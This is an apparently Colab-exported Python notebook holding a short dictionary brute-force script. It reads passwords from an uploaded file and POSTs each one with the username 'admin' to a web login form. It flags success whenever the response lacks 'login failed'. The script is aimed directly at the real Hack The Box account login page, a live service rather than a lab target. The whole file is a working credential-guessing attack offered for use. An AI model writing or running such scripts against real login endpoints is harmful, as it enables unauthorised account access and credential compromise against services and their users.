# -*- coding: utf-8 -*-
"""Untitled12.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1R66XPGeb60ruIbn8W17uoCUrh7s2R78e
"""

import requests


from google.colab import files
uploaded = files.upload()

def brute_force_login(target_url,username, password_list = "Passwords.txt"):
  with open(password_list,"r") as file:
    for password in file.readlines():
        password = password.strip()
        data = {"username": username, "password":password}
        response = requests.post(target_url, data=data)
        if "login failed" not in response.text:
          print(f"Possible credentials found: {username} : {password}")
          return
  print("No valid credentials found.")

target_url = "https://account.hackthebox.com/login"
brute_force_login(target_url,"admin")